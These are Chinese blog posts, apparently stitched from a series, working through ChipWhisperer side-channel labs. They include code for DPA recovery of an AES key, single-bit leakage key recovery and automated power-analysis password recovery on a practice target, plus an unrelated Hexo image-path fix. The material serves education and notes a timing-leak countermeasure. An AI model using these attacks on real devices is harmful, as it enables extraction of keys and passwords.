• 接下来看到如下提示，大意是：“回想一下，功耗与微控制器之间存在关系的原因是，设置数据需要消耗能量。我们还看到，设置的数据越多，平均功耗越大。事实上，能量消耗与设置为1的bit的个数（汉明重量）存在一定的联系。虽然汉明重量是一个非常简单的概念，但是它实际上不容易计算。但在python中有更简单的方式，将待计算的数转换为二进制的字符串，然后计算1的个数即可”

  

• 接着的代码是，制作一个256字节对应的汉明重量的表，后续可直接通过查表来获得汉明重量

  

• 接下来的提示，大意是"我们第一个问题是我们不知道SBox操作发生在哪？它应该发生在非常接近起点的位置（让我们猜测它发生在最开始的2000个样本中）。一个想法是我们可以根据汉明重量将能量迹分组然后给每组分配一个颜色。如果我们画出图，我们也许就可以找到一种模式。"

  

• 运行截图如下图所示：

  

• 接着可以看到如下提示信息，大意就是，从上图看不出什么来，那是因为SBox只是很小一部分，有许多噪声影响了观察，所以需要重新处理数据，先按汉明重量分组后求平均值，再将每组平均值减去总体的平均值，然后再重新画图

  

• 补全后代码如下

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  hw_groups=[[] for i in range(9)] import numpy as np bnum = 0 for tnum in range(len(trace_array)): hw_of_byte = HW[aes_internal(textin_array[tnum][bnum], key[bnum])] hw_groups[hw_of_byte].append(trace_array[tnum]) hw_averages = [np.mean(np.array(each), axis=0) for each in hw_groups] avg_trace=np.mean(trace_array, axis=0) from bokeh.plotting import figure, show from bokeh.io import output_notebook from bokeh.palettes import brewer output_notebook() p = figure() plot_start = 0 plot_end = 2000 xrange = range(len(trace_array[0]))[plot_start:plot_end] color_mapper = brewer['PRGn'][9] for hw in range(9): p.line(xrange, (hw_averages[hw]-avg_trace)[plot_start:plot_end], line_color=color_mapper[hw])

  

• 重新画图结果如下图所示

  

• 根据如下提示，运行代码，可以找到图中差异最大的地方

  

• 接着有如下提示，大意是“现在可以知道SBox操作发生的地方了，用上面的sbox_loc来重新画图，要使用**hw_averages[:,sbox_loc]**来取值需要将hw_averages转换为numpy array”

  

• 最终结果如下图所示，可以看到汉明重量与能量消耗呈现出线性关系

  

总结

• 学习了汉明重量与能耗之间的关系，通过画图知道两者是线性相关的关系

• 本篇将跟随chipwhisperer-jupyter sca101的教程来学习DPA(Differential Power Analysis，差分能量分析)

• 与上一篇不同，本篇将攻击真正的AES算法

  

开始

• 这次选择的是Lab3_3，可以看到同样有MAIN、HARDWARE和SIMULATED三种ipynb，这里同样选择将硬件的内容复制到MAIN中执行

  

• 首先可以看到选择版本号的提示如下图所示，这里提到对于'CWLITEXMEGA'的加密模块可以选择'AVRCRYPTOLIB'，但这里不选择'AVRCRYPTOLIB'，因为测试选用这个，效果太好了，可以相对比较轻松的恢复整个AES密钥，基于学习目的，所以这里保持默认，选择'TINYAES128C'

  

• 前几行代码，跟之前的作用一样，初始化chipwhisperer，编译目标板固件并上传

  

• 接下来的代码，就是抓取2500条能量迹

  

• 接下来查看MAIN中的Summary，大意是：“在上一个的教程中，你知道了如何利用一个位的信息去恢复一个AES密钥的byte。需要注意的是，这个方法之所以能生效是因为我们攻击的数据流中存在那个S-Box。接下来我们将学习如何用能量分析而不是一个实际的bit去恢复AES密钥。这项技术的目标是利用S-Box输出结果的一个bit（无论哪个bit都行）将能量迹分成两部分。如果那个bit的值是1，那么对应的那组数据的能耗将比另一组的要高。这些都基于之前的教程：数据总线中数据的值与能量消耗之间有一定的联系”

  

• 接下来看到如下提示，大意是说：“不需要记住AES复杂的模型-我们可以直接将上一篇的AES模型复制过来”

  

• 如下图，这部分代码确实是上一篇中的AES简单模型。这里之所以能用这个模型是因为，真正的AES模型也包含了这个流程，只是多了其它几个流程。DPA分析AES时，不需要知道这个流程具体发生在能量迹的哪个时间点，但是整个能量迹的时间段需要包含这个流程发生的时间段，不然就无法分析（都没抓取到，当然无法分析）。

  

• 接下来的提示，是说完成生成能量迹的代码，可以选择模拟或者硬件的代码复制过来。这里上面已经复制了硬件的代码运行了，所以直接跳过到下一个节点

  

• 往下掉提示是完成画图的代码，画出一到两条能量迹

  

• 接着是查看输入数据是什么样的

  

• 接下来的提示是说：这个攻击需要用一个方法将能量迹分成两组，分组的依据是我们猜测的值中的一个bit。这里为了简单起见，先猜测一个byte的AES密钥。开始之前-需要定义能量迹的数量和每条能量迹的点的数量。可以直接运行下面的代码例子来定义这两个变量

  

• 接下来的提示信息，大意是：让我们补全代码，将能量迹分成两组，并将两组求平均值，再取两者差的绝对值，最后得到两组中的最大差值。有个需要注意的是使用numpy的mean计算平均值时，需要指定axis=0。为了方便测试，还给出了密钥key第一个byte的真实值0x2b。如果遇到问题，往后还有提示。

  

• 根据上面信息补全代码，运行后如下图所示，可以看到只有0x2b拥有最大的差异值，与上面描述的一致，这样就恢复了key的第一个byte："0x2b"

  

• 接下来思考，这个方法为什么生效，为什么可以用aes_internal这个函数来划分两个组？

  • 可以用aes_internal函数来分组，是因为真正的AES拥有与aes_internal类似的代码片段SubBytes，只不过真正AES还有AddRoundKey、ShiftRows、MixColumns三种操作
  • 现在假设用相同密钥key加密2500数据样本，并根据其某一次SubBytes的输出的第0个byte的第0位的值来分成''0"和"1"两组，那么这两组数据所对应的能量迹会有一定的差异（这是前面的知识，指令相同情况下，数据也会对能量消耗产生影响）
  • 现在使用aes_internal来对某个key加密的能量迹进行分组，如果猜测的密钥guess是真实值，那么分组结果就恰好是某一次SubBytes的输出的第0个byte的第0位的值'0'和'1'的分组，两组数据会有1个bit的明显差异，那么两者的能量消耗会有比较明显的差异，如果guess不是真实值，那么分组结果的'0'和'1'的两组的数据是随机的，两组数据没有明显差异，两组的能量消耗也就不会有太大差异，这就是这个方法可以生效的原因

• 接着往下运行，可以看到如下的信息，大意是说：你想要对猜测结果进行排序，这样可以帮助确定最有可能的值。一个最好的方式就是用一个list保存每个猜测的key的最大差异。然后可以使用numpy的argsort来实现排序。

  

• 按照上述信息，修改代码后，可以把差异最大的前5的key打印出来，如下图所示

  

• 接着可以看到，用来计算差异的函数calculate_diffs

  

• 接着按照提示，运行代码，查看画出不同key对应的差异图，这个图的作用就是：既可以直观的看出不同猜测的key造成的差异，又可以看到哪些位置会出现尖峰

  

• 接下来就是根据提示信息，完成自动猜测AES密钥所有字节的代码

  

• 补全代码后，运行结果如下图所示，可以看到，猜测正确的寥寥无几（只有第0、5、10个字节这三个是正确），造成这个原因有不少（比如算法实现方式也有关系，如果硬件是CWLITEXMEGA，并且算法选的是AVRCRYPTOLIB，那么这里将直接得到16正确的结果）

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  from tqdm import tnrange import numpy as np #Store your key_guess here, compare to known_key key_guess = [] known_key = [0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c] for subkey in tnrange(0, 16, desc="Attacking Subkey"): max_list=[] for guess in range(256): max_diff_value = max(calculate_diffs(guess, subkey)) max_list.append(max_diff_value) print('Subkey {} - most likelv {:02x} (actual {:02x})'.format(subkey,np.argsort(max_list)[::-1][0], known_key[subkey]))

  

• 接下来看看教程怎么说这个现象，如下图所示，大意是说：你可能在前面并没有恢复整个密钥？不用担心-造成这个现象是因为有一些其它因素导致的。有一篇关于DPA攻击的文章提到的观点是“你获取了另一个不是正确密钥的强峰（它可能是幽灵峰）”。后面将会有更有效的攻击方法，但是，对于现在，让我们来看一些解决方案：

  • 增加抓取的能量迹数量（如将2500变成5000或者10000），增加数据有时就可以解决这个问题了，但有时候真正的幽灵峰可能不会消失，这种情况就需要用其它方法。
  • 修改攻击的目标位数（如第'0'位改为第'3'位）或者综合多个位的结果
  • 截取数据

  

• 接下来就是按照提示信息，运行一个准备好的DPA攻击代码块

  

• 接着就看到如下提示信息，大意是让我们画出猜测错误key的前几个可能值和真实key的差异图

  

• 这里因为第5个subkey猜测恰好是正确的（与教程的例子不同），所以选择第1个subkey画图

  

  

• 接着看到如下提示信息，大意是说，通过放大你应该可以看到正确key的峰形会在某些地方拥有比错误key的峰形高。从上图看确实如此，在3000和5000附近的位置，正确key的尖峰（绿色）很明显，另外两个的则只在2000附近有一个大的尖峰

  

• 然后可以看到如下提示信息，大意是说：取决于你的硬件设备，上图中你会看到一个不错的大尖峰或者多个尖峰。如果有幽灵峰的问题，那么很可能就会有多个尖峰。错误的峰可能与正确的峰错开--所以我们首先可以把所有正确key对应的峰形画出来

  

• 接下来的提示信息是，大意是说：最后一个技巧是 -- 截取数据的一些片段会很有用。例如，从上图可以看到，正确的峰图总是每隔60个周期出现，第一个峰出现在附近1100（这个对于你的硬件可能有所不同）。然后就是提示如何修改代码

  

• 最后按照提示做了如下修改，从3220出开始，截取能量迹的数据，这里可以不按每个subkey隔60时钟周期取值，因为实测这样效果更好

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  from tqdm import tnrange import numpy as np #Store your key_guess here, compare to known_key key_guess = [] known_key = [0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c] #Which bit to target bitnum = 0 full_diffs_list = [] for subkey in tnrange(0, 16, desc="Attacking Subkey"): max_diffs = [0]*256 full_diffs = [0]*256 for guess in range(0, 256): full_diff_trace = calculate_diffs(guess, subkey, bitnum) full_diff_trace = full_diff_trace[(3220 + subkey*0):] max_diffs[guess] = np.max(full_diff_trace) full_diffs[guess] = full_diff_trace #Make copy of the list full_diffs_list.append(full_diffs[:]) #Get argument sort, as each index is the actual key guess. sorted_args = np.argsort(max_diffs)[::-1] #Keep most likely key_guess.append(sorted_args[0]) #Print results print("Subkey %2d - most likely %02X (actual %02X)"%(subkey, key_guess[subkey], known_key[subkey])) #Print other top guesses # print(" Top 5 guesses: ") # for i in range(0, 5): # g = sorted_args[i] # print(" %02X - Diff = %f"%(g, max_diffs[g])) # print("\n")

  

• 最后运行结果，如下图所示，猜测准确的字节数由原来的3个字节提升到全部字节都猜测正确，不得不说，这个提升很大

  

• 这里解释下为什么从3220的位置开始截取能量迹数据而不是2000附近的位置开始？-- 如下图，因为2000附近的位置除了正确的key会出现尖峰外，错误的key也会出现尖峰，所以需要寻找一个只有正确的key会出现明显尖峰的地方作为数据截取的起始点

  

总结

• 学习了如何利用差分能量分析(DPA)来恢复整个AES密钥
• 了解了幽灵峰的现象，以及一些解决方法

• 本篇将继续跟随chipwhisperer-jupyter sca101的教程来学习从一个Bit的信息来恢复"AES"的密钥，这里的"AES"当然不是标准的AES，但是也挺接近了，为后面能量分析真正的AES提供理论基础

  

开始

• 首先打开Lab 3_2 - Recovering Data from a Single Bit.ipynb，与前面不同，这个notebook不需要硬件就可以完整运行

  

• 可以到如下提示，大意是说：“你可以把"AES"看成是密钥key和输入数据input异或(XOR)后，再将结果通过S-Box进行字节替换得到输出”。虽然这个"AES"比真正的AES要简单的多，但真正AES的确包含类似的方式，所以通过这个例子来学习确实很适合新手。后面用到的加密模型就是基于下图所提到的XOR + SubBytes

  

• 接着就是给出了AES的S-Box，然后提示根据sbox补全接下来的函数

  

• 补全aes_internal函数，根据提示描述可知实现该函数的要点：1. 输入和输出相异或 2.根据异或结果从sbox中查表获得最后输出，总结起来就是sbox[inputdata ^ key]

  

• 紧接着有个简单检验前面的aes_internal函数是否正确实现的代码块，执行后出现'OK to continue!'就说明应该没什么问题

  

• 接着可以看到如下提示信息和代码，大意就是：“定义一个新的函数aes_secret，不对外暴露key参数，而是内置一个固定的key。后面的攻击就是攻击这个函数，并且假设我们不能直接获得这个预设的固定key是多少但是能获得1个bit的信息”

​

• 紧接着看到如下提示信息和代码块，这段信息目的就是通过这个例子引导我们如何用python生成随机数，并将生成数据通过一个加密函数得到输出

  

• 接着就是根据提示，补全生成随机数据input_data的代码，并且同样有一个简单判断代码实现是否正确

  

• 接着是根据提示信息生成泄漏数据（模拟每个byte泄漏一个bit），"& 0x01"的作用就是取最低位，也就是这里取的是每个byte的第0位，另外可以看到，生成的泄漏数据全为'0'和'1'

  

• 接着有个提示，可以通过画图来直观查看泄漏数据leaked_data的内容，然后有个提问是：“你认为我们将能从这些数据中获取一些有用的东西吗？让我们攻击它来找到答案”

  

• 接着看到如下提示信息，大意是：“让我们攻击之前的模型（知道算法等信息，只是不知道密钥key），然后用所有可能的key获取一系列的数据，再跟上面泄漏的信息做对比，根据有多少相同来判断猜测是否正确。首先，需要补全一个函数，让该函数返回两个lis之间t有多少相同元素的数量”

  

• 如下图，获得两个list相同元素的数量代码可以用numpy array来实现，先转为numpy array，再让两个array用'=='比较，最后sum就可以计算得到'True'(1)的数量

  1 2 3 4 5 6 7 8 9 10 11 12 13

  import numpy as np def num_same(a, b): if len(a) != len(b): raise ValueError("Arrays must be same length!") if max(a) != max(b): raise ValueError("Arrays max() should be the same!") #Count how many list items match up _a=np.array(a) _b=np.array(b) return (_a==_b).sum()

  

• 同样地，有个简单判断我们代码是否正确实现地代码块

  

• 然后可以看到如下提示信息，大意就是：补齐代码，调用aes_internal函数，用key每个可能值[0x00,0x01,...,0xff]加密相同的input_data得到key_guess，再将结果与泄漏数据相比较获得两个list相同的值

  

• 根据上面提示信息可以补全代码，运行结果如下

  1 2 3 4 5 6 7 8 9 10

  for guess in range(0, 256): #Get a hypothetical leakage list - use aes_internal(guess, input_byte) and mask off to only get value of lowest bit hypothetical_leakage = [(aes_internal(a,guess) & 0x01) for a in input_data] #Use our function same_count = num_same(hypothetical_leakage, leaked_data) #Print for debug print("Guess {:02X}: {:4d} bits same".format(guess, same_count))

  

• 结合上图的输出信息，正如下图的提示信息一样，大部分猜测的'byte'输出相同数目都是500左右，只有'0xEF'是1000（前提是前面的内置key没有设置为其他），所以'0xEF'是固定密钥key的唯一可能值

  

• 接下来是介绍numpy的argsort，如下图np.argsort()可以从小到大排序一个list（注意这里argsort结果是输出list下标index的排序结果，也就是最小数据所在index到最大数据所在index），要从大到小排序可以在结果加[::-1]或者np.argsort(-np.array(list()))

  

• 接下来的提示信息就是，利用argsort来补全代码，让代码输出相同数前5的猜测key

  

• 按照提示可以补全代码，如下图，可以看到，代码成功输出相同数量排在前5的猜测值

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  import numpy as np guess_list = [0] * 256 for guess in range(0, 256): #Get a hypothetical leakage list - use aes_internal(guess, input_byte) and mask off to only get value of lowest bit hypothetical_leakage = [(aes_internal(a,guess) & 0x01) for a in input_data] #Use our function same_count = num_same(hypothetical_leakage, leaked_data) #Track the number of correct bits guess_list[guess] = same_count #Use np.argsort to generate a list of indicies from low to high, then [::-1] to reverse the list to get high to low. sorted_list = np.argsort(guess_list)[::-1] #Print top 5 only for guess in sorted_list[0:5]: print("Key Guess {:02X} = {:04d} matches".format(guess, guess_list[guess]))

  

• 接下来可以看到如下提示信息，大意是说：“这个例子是我们知道第'0'位就是泄漏数据所在的位，但如果我们不知道泄漏的数据是哪一位信息呢？有个简单的方法解决这个问题就是修改上面的代码让它猜测每个可能byte中8个可能的bit，要做到这点，首先要做的是写一个函数来返回一个byte指定位的值”

  

• 前面可以知道"& 1"可以获得第0位的值，那么获取指定位值就可以配合移位运算来实现。首先将需要获得的位右移到第0位，再用"& 1"即可。如下图get_bit函数如下，同样有个简单判断代码实现是否正确的代码块

  

• 然后就是补全aes_leakage_guess代码

  

• 最后可以看到如下提示信息，大意就是：用上面的aes_leakage_guess函数补全新的循环，获得每个可能byte每个可能的bit与泄漏数据相比相同的数量。而且还提到，将可以看到只有第'0'位的是有'0xEF'=1000，其余位都是500左右的其他结果。

  

• 补全代码如下，结果也确实跟预期一样，只有第0位的才猜测出正确结果

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

  for bit_guess in range(0, 8): guess_list = [0] * 256 print("Checking bit {:d}".format(bit_guess)) for guess in range(0, 256): #Get a hypothetical leakage for guessed bit (ensure returns 1/0 only) #Use bit_guess as the bit number, guess as the key guess, and data from input_data hypothetical_leakage = [aes_leakage_guess(a, guess, bit_guess) for a in input_data] #Use our function same_count = num_same(hypothetical_leakage, leaked_data) #Track the number of correct bits guess_list[guess] = same_count sorted_list = np.argsort(guess_list)[::-1] #Print top 5 only for guess in sorted_list[0:5]: print("Key Guess {:02X} = {:04d} matches".format(guess, guess_list[guess]))

  

• 修改前面的leaked_data的代码，可以按如下图修改，这样泄漏数据就是第'3'位的泄漏数据了

  

• 重新往下运行，可以看到变成第'3'位猜测才有1000 matches了，与预期一致

  

• 接下来，可以看到如下提示信息，大意就是：给泄漏数据的函数加点“料”，修改aes_secret函数，让它根据随机数来决定返回正确加密结果还是0，以此来模拟噪声

  

• 然后可以看到如下提示信息，大意就是：加料后会发生什么？-会影响猜测的key的准确率，而且事实上，将返回正确加密后的值的概率和需要多少观察数据来恢复正确的key画图，可以得到如下图所示的结果，从图可知70%以上正确率的基本上都只需要少量数据就可以恢复出正确的key。

  

• 接下来测试下，让aes_secret有70%概率返回正确结果，并且为了避免混淆，将leaked_data重新改为，获取第'0'位的数据

  

  

• 最后结果如下图所示：可以看到，虽然同样可以得到正确的'0xEF'，但是matches值已经变小了很多，但是与其他相比还是有明显的大小区别

  

• 再来看看10%正确返回的结果，可以看到，虽然同样排在第一的是'0xEF'，但是'0xEF'对应的matches数量与排在第2位的0x'E2'差异不大，所以不能只通过一组数据来确定正确密钥是'0xEF'

  

  

总结

• 学习了如何利用一位的泄漏数据来恢复"AES"的密钥
• 在实际情况中因为存在噪声等因素地干扰，往往需要更多地数据才能正确恢复密钥

• 最近手贱删除了hexo 项目中的node_modules重新安装hexo的插件

• 然后出问题了，博客的所有图片不显示了，全变下面这种情况了

  

• 一开始以为是_config.yml配置问题，但是查看配置文件发现post_asset_folder是设置为true，然后就是各种查找原因

  

• 最后终于找到解决方法，这里记录一下方法

• 首先查看执行hexo clean && hexo g的log输出，可以看到其实图片的相对路径有被替换，只不过替换的有些莫名其妙，不是预期的效果

  

• 经过一番搜索，发现"update link as"是hexo-asset-image的index.js文件输出，于是文本编辑器打开node_modules/hexo-asset-image/index.js，查看下代码，如下图所示，在index.js文件后面可以看到相应的console打印信息

  

• 往上看可以看到用于链接替换的"link"变量的是怎么来的，问题在于if语句中的endPos的获得方式，如下图可知，第一种方式是根据原url是否包含"/index.html"来选择最终substring的结束位置是最后一个'/'还是'.'

  

• 这里因为我hexo设置的是既没有index.html又没有.html只是文件路径形式的url，即："https://xxx.com/a/b/c/"这种形式

  

• 所以因为不符合第一个if语句的条件，就会用url中最后一个'.'所在index作为substring结束位置，知道问题原因就好办了，添加如下代码，重新保存index.js即可

  1 2 3 4 5 6 7 8 9 10 11 12 13 14

  if(/.*\/index\.html$/.test(link)) { // when permalink is end with index.html, for example 2019/02/20/xxtitle/index.html // image in xxtitle/ will go to xxtitle/index/ appendLink = 'index/'; var endPos = link.lastIndexOf('/'); } // add else if (/.*\/$/.test(link)) { var endPos = link.lastIndexOf('/'); } // add end else { var endPos = link.lastIndexOf('.'); }

  

• 新增加的else if语句作用就是简单判断url是否以'/'结尾，是的话直接用'/'作为substring结束位置

• 重新运行hexo clean && hexo g可以看到url替换已经正常了，图片终于又可以正常显示了

  

参考链接

https://hexo.io/zh-cn/docs/asset-folders#相对路径引用的标签插件

• 本篇将继续跟随chipwhisperer-jupyter sca101的教程来学习了解能量分析中的常用模型 汉明重量
• 汉明重量：简单来说就是一个数的二进制包含'1'的个数，如0x00的HM为0，0xFF的HM为8，0x1和0x2的HM都为1

开始

• 如下图，同样选择复制HARDWARE的代码至MAIN中

  

• 同样地根据提示信息选择平台，这里需要注意的是：XMEGA平台的CRYPTO_TARGET既可以使用默认值'TINYAES128C'（全平台通用）也可以使用'AVRCRYPTOLIB'（仅限XMEGA）

  

• 前几行代码，依旧是初始化一些参数和编译并上传合适的固件到目标板中

  

• 接着就是提示信息和相应的代码，大意是说为了查看不同汉明重量的数据对能量消耗的影响，这里生成两种极端数据'0x00'(00000000)和'0xff'(11111111)，100个traces就足够查看两者的差异

  

• 接着往下运行，可以看到如下提示信息，大意是指：查看HM大的0xFF和HM小的0x00数据对运行AES时的能量消耗差异，由于这些数据是混合在一起的，所以首先需要对抓取的数据进行分组，分为one_list和zero_list

  

• 按照提示修改代码将数据分为两组，并将结果转为numpy array类型

  1 2 3 4 5 6 7 8 9

  zero_list=[] one_list=[] for i in range(len(trace_array)): if textin_array[i][0] == 0x00: zero_list.append(trace_array[i]) else: one_list.append(trace_array[i])

  1 2 3 4 5 6

  one_list=np.array(one_list) zero_list=np.array(zero_list) assert len(one_list) > len(zero_list)/2 assert len(zero_list) > len(one_list)/2

• 接着可以看到如下提示信息，大意是：使用np.mean分别对上面两组数据的trace求平均值，得到zero_avg和one_avg的数据，其中'axis'参数可用来指定求均值的方向（按行或者按列求）

  

• 按照提示信息，修改代码，求两组数据的平均值，

  1 2 3 4 5 6 7

  trace_length = len(one_list[0]) print("Traces had original sample length of %d"%trace_length) one_avg=np.mean(one_list, axis=0) if len(one_avg) != trace_length: raise ValueError("Average length is only %d - check you did correct dimensions!"%one_avg)

  1 2 3 4 5 6 7

  trace_length = len(zero_list[0]) print("Traces had original sample length of %d"%trace_length) zero_avg=np.mean(zero_list, axis=0) if len(zero_avg) != trace_length: raise ValueError("Average length is only %d - check you did correct dimensions!"%zero_avg)

• 最后就是画出两组的差异图

  1 2 3 4 5 6 7

  %matplotlib notebook import matplotlib.pyplot as plt diff = one_avg[:1000] - zero_avg[:1000] plt.plot(abs(diff)) plt.show()

  

• 往下可以看到如下提示信息，大意是说：在前面的位置你可以看到一个明显的差异，这个代表着数据的差异也可以在能量图中体现出来。对比上图确实如此，在200的位置可以看到一个明显的峰值，其余部分的差异都非常小

  

• 接下来尝试不同的数据与'0x00'的对比，下图'0x01'与'0x00'的对比，可以看到，两者差异并不明显，不能识别出差异数据所在位置

  

• 出现上图原因是，抓取的数据太少，将前面的N=100改为N=1000，重新运行，并画图，可以看到同样可以看到一个明显的

  

  

总结

• 除了代码会对能量消耗产生影响外，代码所处理的数据同样会对能量消耗产生影响
• 有时为了区分出数据的细微差异，往往需要抓取更多的数据才能保证出现预期的结果

• 本篇将基于chipwhisperer-jupyter sca101的Lab 2_1B来学习如何通过能量分析得出简单密码验证系统的正确密码

  

开始

• 可以看到同样有MAIN、HARDWARE和SIMULATED，跟之前一样，这里选择把HARDWARE的代码复制到MAIN执行

  

• 开始同样是选择合适的平台，这里因为目标板是XMEGA，所以只需改PLATFORM为'CWLITEXMEGA'即可

  

• 前几行代码其实作用就是初始化一些参数和编译合适的目标板固件并上传至目标板

  

  

• 接着运行，可以看到'OK to continue!'，说明前面的配置没有问题，可以继续往下运行

  

• 接着看到如下提示信息，大意是：“所以我们能做些什么呢？首先我要作弊并且告诉你我们拥有一个以'h'开头的预设密码，并且密码长度是5位，但是这是唯一的提示-你能用这些信息来干什么？”，然后便是让我们画一个发送'h'作为输入密码和另外一个值的能量消耗图

  

• 根据提示，补全代码，运行即可看到，输入'h'和'r'作为密码时，微控制器的能量消耗波形

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  #Example - capture 'h' - end with newline '\n' as serial protocol expects that trace_h = cap_pass_trace("h\n") trace_r = cap_pass_trace("r\n") print(trace_h) # ################### # Add your code here # ################### %matplotlib notebook import matplotlib.pyplot as plt plt.plot(trace_h) plt.plot(trace_r) plt.show()

  

• 往下有以下提示信息，意思就是说：应该看到与下图1类似的结果，并且如果是使用了%matplotlib notebook魔法值，那么可以放大缩小查看图片

  

• 这里要放大缩小图片，需要点击左下角保存图标左边的一个控件，点击后，右下角出现'zoom rect'字样即可开始放大图片，如果还需要移动，则点击移动的图标即可。

  

• 接着往下运行，可以看到以下提示信息，大意是：接下来画所有可能的密码对应的能量消耗图，这个密码的实现只在'abcdefghijklmnopqrstuvwxyz0123456789'之中。提示信息还提到上面的波形图太长了，不好看，可以将scope.adc.samples设为500

  

• 按照提示信息修改完代码后，运行效果如下

  1 2 3 4 5 6 7 8 9 10 11 12 13

  %matplotlib notebook import matplotlib.pyplot as plt scope.adc.samples = 500 plt.figure() LIST_OF_VALID_CHARACTERS='abcdefghijklmnopqrstuvwxyz0123456789' for CHARACTER in LIST_OF_VALID_CHARACTERS: trace = cap_pass_trace(CHARACTER + "\n") plt.plot(trace, label=CHARACTER) plt.legend() plt.show()

  

• 往下可以看到提示信息说，图片放大后应该可以看到有一条曲线不与其他曲线重叠在一起

  

• 事实也是如此，如下图所示，有一条曲线明显与其他曲线偏离开，这条曲线其实就意味着输入了一位正确密码，根据其颜色与旁边的图例可知改峰图可能为'h'或者'r'（这里图中两者颜色一样不好区分），但结合已知第一位是'h'，所以可知实际代表的就是'h'

  

• 接着可以看到如下提示信息，让我们进行猜测第二位密码

  

• 按提示信息修改密码后，再次画图，如下图，可以看到有一条粉丝曲线明显与其他曲线不重叠，但由于图例中'g'、'q'、'0'都是粉色，所以不能直接判断是哪个，这是matplotlib的缺陷

  1 2 3

  # 将循环的trace = cap_pass_trace(CHARACTER + "\n")改为以下代码即可猜测第二位 trace = cap_pass_trace('h'+CHARACTER + "\n")

  

• 改为用plotly画图，plotly同样为python画图的库，而且对比matplotlib，plotly有个优点就是，当你鼠标悬浮在某个位置时，它会显示该点对应的曲线信息，这样一来就容易区分是哪个字符了。如下图，图中明显与其他曲线分离的是字符'0'所对应的曲线，因此，可以推断第二位密码为'0'

  1 2 3 4 5 6 7 8 9

  import plotly.graph_objects as go import numpy as np fig = go.Figure() LIST_OF_VALID_CHARACTERS='abcdefghijklmnopqrstuvwxyz0123456789' for CHARACTER in LIST_OF_VALID_CHARACTERS: trace = cap_pass_trace('h'+CHARACTER + "\n") fig.add_trace(go.Scatter(x=np.array(range(trace.shape[0])), y=trace, mode='lines', name=CHARACTER,text=CHARACTER)) fig.show()

  

自动化判断

• 再往下就可以看到如下信息，大意是：假定现在不知道任何密码，要自动化判断正确密码的一个简单方法是，用'0x00'即空密码和其他输入做比较

  

• 按提示，运行后，如下图，图中的两条曲线基本上重叠在一起了，因为'c'同样不是正确密码

  

• 接下来的提示信息，就是让我们画出每个可能密码减去以'0x00'作为基线后的曲线图

  

• 按提示修改代码后，画图结果如下

  1 2 3 4 5 6 7 8 9 10 11 12 13

  %matplotlib notebook import matplotlib.pyplot as plt plt.figure() LIST_OF_VALID_CHARACTERS='abcdefghijklmnopqrstuvwxyz0123456789' ref_trace = cap_pass_trace( "\x00\n") for CHARACTER in LIST_OF_VALID_CHARACTERS: trace = cap_pass_trace(CHARACTER + "\n") plt.plot(trace - ref_trace, label=CHARACTER) plt.legend() plt.show()

  

• 可以看到上图跟下面提示信息一致，有一条图曲线比较突出

  

• 接下来提示信息就是说：让我们利用numpy的sum和abs来计算差异

  

  

• 按提示修改代码，计算每种可能密码的能量消耗数据减去'0x00'为基准的数据，最后求和得出差异值。如下图所示，字符'h'拥有最大的差异值，也就是说正确密码拥有最大的差异值

  1 2 3 4 5 6 7 8 9

  import numpy as np ref_trace = cap_pass_trace( "\x00\n") for CHARACTER in LIST_OF_VALID_CHARACTERS: trace = cap_pass_trace(CHARACTER + "\n") diff = np.sum(np.abs(trace - ref_trace)) print("{:1} diff = {:2}".format(CHARACTER, diff))

  

• 接下来的提示信息，就是让我们修改代码，自动化判断出每一位正确密码

  

• 如下图，按提示信息修改代码运行后，最终得出正确密码'h0px3'，如果结果是'hhhhh'或者其他则需要检查代码是否有问题

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  import numpy as np LIST_OF_VALID_CHARACTERS='abcdefghijklmnopqrstuvwxyz0123456789' guessed_pwd = "" for i in range(5): ref_trace = cap_pass_trace(guessed_pwd + "\x00\n") m=0 c='\x00' for CHARACTER in LIST_OF_VALID_CHARACTERS: trace = cap_pass_trace(guessed_pwd + CHARACTER + '\x00\n') diff = np.sum(np.abs(trace - ref_trace)) if diff > 25: guessed_pwd += CHARACTER print(guessed_pwd) break

  

• 接下来看看目标板固件的源码实现，在hardware/victims/firmware/basic-passwdcheck目录下的basic-passwdcheck.c文件中，我们可以看到，main函数中定义的代码的确就是"h0px3"。从下面源码，可以推测，正确密码与错误密码会有较大的差异主要在于，正确的密码需要执行更多的循环语句

  

• 那么问题来了：把错误密码的break语句注释掉，还能用这个方法判断正确密码吗？

  

• 按上图中修改basic-passwdcheck.c代码，重新编译并上传至目标板

• 再次运行画图和计算差异的代码，可以看到已经不能判断出，哪个是正确代码了

  

  

• 所以如果要简单防止这种攻击，一个简单方法就是即使已经判断出密码错误，也让它跑完整个循环而不是跳出循环，虽然这会造成一定性能上的损失，但是这是个简单有效的方法

总结

• 学习了如何利用能量分析来判断出简单密码验证系统中的正确密码
• 学习了如何简单地防范这种能量分析攻击

• 最近入手了块Chipwhisperer-lite，决定先跟着官方教程学习了解侧信道攻击
• New-AE官网：https://www.newae.com/
• Chipwhisperer官方GitHub仓库：https://github.com/newaetech/chipwhisperer
• Chipwhisperer软件环境官方安装教程：https://chipwhisperer.readthedocs.io/en/latest/index.html

指令能耗差异

• 本篇将跟着官方的chipwhisperer-jupyter教程sca101的**Lab 2_1A - Instruction Power Differences **学习CPU运行不同指令时消耗的能量差异

• 首先可以看到sca101目录下有三个Lab 2_1A - Instruction Power Differences 的.ipynb文件，其实从后缀就可以看出，第二个是主程序的代码，第一个对应的是拥有Chipwhisperer硬件时可运行的代码，第三个是没有硬件时模拟运行的代码

  

• 打开MAIN的ipynb，可以看到，最前面有提示选择模拟的代码块或者硬件的代码块复制到这个notebook代码中

  

